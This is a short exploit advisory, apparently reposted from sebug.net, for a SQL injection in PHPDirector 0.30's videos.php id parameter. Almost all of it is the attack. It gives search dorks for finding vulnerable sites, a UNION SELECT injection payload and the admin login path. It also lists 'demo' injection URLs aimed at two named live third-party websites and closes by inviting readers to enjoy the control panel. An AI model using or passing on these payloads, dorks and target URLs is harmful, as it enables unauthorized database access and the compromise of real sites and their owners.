PHPDirector 0.30 (videos.php) SQL Injection Vulnerability
SEBUG-ID:19887
Published:2010-06-29
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
====================================================================== PHPDirector 0.30 (videos.php) SQL Injection Vulnerability # ====================================================================== # Date : 29/06/2010 # # Author : Mr-AbdoX # # Emails : Y6u@HoTmaiL.Com & Oz1@HoTmaiL.Com # # My web Sites : http://Sec-Eviles.com/vb & http://Arspam.com/ # # Script home : www.phpdirector.co.uk/ # # Tested on : Linux & Windows # =================Exploit============================================ Dork: [Powered by: PHPDirector 0.30] 0r [ inurl:videos.php?id= ] [~] ExploiT [~] http://www.site.com/videos.php?id=[SQL] union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- [~] ConTroL Panel (admin login) [~] http://www.site.com/login.php [~] demo [~] http://www.onevent.biz/paramore/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- http://www.videoindirizle.com/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- enjoy in control panel Like U WanT :p Don't Forget greetz Me... Peace [~] GreetZ To [~] The Invisible , Dr.Html , Mehdiz , Mr-Yasen , The S3r!0uS , Dr.Solo , ProF.Sellim & All Morrocans H4xorz
// sebug.net [2010-06-29]